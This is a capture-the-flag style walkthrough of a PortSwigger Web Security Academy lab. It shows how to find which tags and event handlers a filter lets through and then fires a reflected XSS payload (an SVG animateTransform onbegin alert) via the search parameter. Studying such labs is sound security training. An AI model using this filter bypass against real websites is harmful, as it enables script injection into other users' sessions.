| Field | Value |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Difficulty | Practitioner |
| Vulnerability | Reflected XSS — SVG Tag Bypass |
| Injection Point | search URL parameter |
| Goal | Fire an alert via an allowed SVG tag and event |
Lab — Reflected XSS: SVG Tag Bypass¶
Solution Walkthrough¶
Testing common tags — all blocked. Custom tags pass but need event handlers that work. Time to enumerate systematically.
Step 1 — Find allowed tags¶
Intercepting the request and sending to Intruder with the tag position fuzzed:
/?search=<§tag§>
Tags returning HTTP 200: image, svg, title, animateTransform.
Step 2 — Confirm the SVG + animateTransform combination¶
GET /?search=<svg><animateTransform> HTTP/1.1
HTTP 200 — valid combination.
Step 3 — Enumerate allowed events on animateTransform¶
Sending to Intruder and fuzzing the event handler:
GET /?search=<svg><animateTransform §event§=1> HTTP/1.1
onbegin returns HTTP 200.
Step 4 — Inject the payload¶
/?search=<svg><animateTransform onbegin=alert(0)>
Alert fires and the lab is solved :P